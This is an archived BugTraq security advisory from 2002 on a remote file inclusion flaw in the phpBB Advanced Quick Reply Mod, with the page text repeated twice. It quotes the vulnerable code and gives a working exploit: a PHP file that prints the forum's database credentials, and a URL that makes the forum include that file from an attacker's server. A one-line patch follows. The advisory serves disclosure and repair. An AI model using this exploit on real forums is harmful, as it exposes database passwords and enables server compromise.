BugTraq
Back to list
|
Post reply
Code Injection in phpBB Advanced Quick Reply Mod
Nov 13 2002 07:49AM
Hai Nam Luke (hainamluke hotmail com)
Software: phpBB Advanced Quick Reply Mod
I've found a security hole in this sofware (Code Injection). You can
download this software at http://phpbbhacks.com/viewhack.php?id=586
Hackers can exploit this Mod to inject some shell code to hack your forum,
your website or your server (local exploit) because Code Injection is a
dangerous technique of hackers.
Exploit: (quick_reply.php)
if ( $mode == 'smilies' )
{
define('IN_PHPBB', true);
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
include($phpbb_root_path . 'includes/functions_post.'.$phpEx);
generate_smilies('window', PAGE_POSTING);
exit;
}
And you can make a php file which named 'extension.inc' to inclusion to
access that forum. example:
<?php
include('config'.'.php');
echo "DB Type: $dbms <br>";
echo "DB Host: $dbhost <br>";
echo "DB Name: $dbname <br>";
echo "DB User: $dbuser <br>";
echo "DB Pass: $dbpasswd <br>";
exit;
?>
After that, you upload this file to your server (http://[Your
Server]/extension.inc) and enter URL
http://[phpBB_Forum]/quick_reply.php?phpbb_root_path=http://[Your
Server]/&mode=smiles
You'll be recived all DB Info of forum
Patch: (quick_reply.php)
[FIND]
if ( $mode == 'smilies' )
{
[ADD BEFORE]
phpbb_root_path = "./";
Sorry for my poor english.
Luke (HVA)
http://www.hackervn.net
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Software: phpBB Advanced Quick Reply Mod
I've found a security hole in this sofware (Code Injection). You can
download this software at http://phpbbhacks.com/viewhack.php?id=586
Hackers can exploit this Mod to inject some shell code to hack your forum,
your website or your server (local exploit) because Code Injection is a
dangerous technique of hackers.
Exploit: (quick_reply.php)
if ( $mode == 'smilies' )
{
define('IN_PHPBB', true);
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
include($phpbb_root_path . 'includes/functions_post.'.$phpEx);
generate_smilies('window', PAGE_POSTING);
exit;
}
And you can make a php file which named 'extension.inc' to inclusion to
access that forum. example:
<?php
include('config'.'.php');
echo "DB Type: $dbms <br>";
echo "DB Host: $dbhost <br>";
echo "DB Name: $dbname <br>";
echo "DB User: $dbuser <br>";
echo "DB Pass: $dbpasswd <br>";
exit;
?>
After that, you upload this file to your server (http://[Your
Server]/extension.inc) and enter URL
http://[phpBB_Forum]/quick_reply.php?phpbb_root_path=http://[Your
Server]/&mode=smiles
You'll be recived all DB Info of forum
Patch: (quick_reply.php)
[FIND]
if ( $mode == 'smilies' )
{
[ADD BEFORE]
phpbb_root_path = "./";
Sorry for my poor english.
Luke (HVA)
http://www.hackervn.net
[ reply ]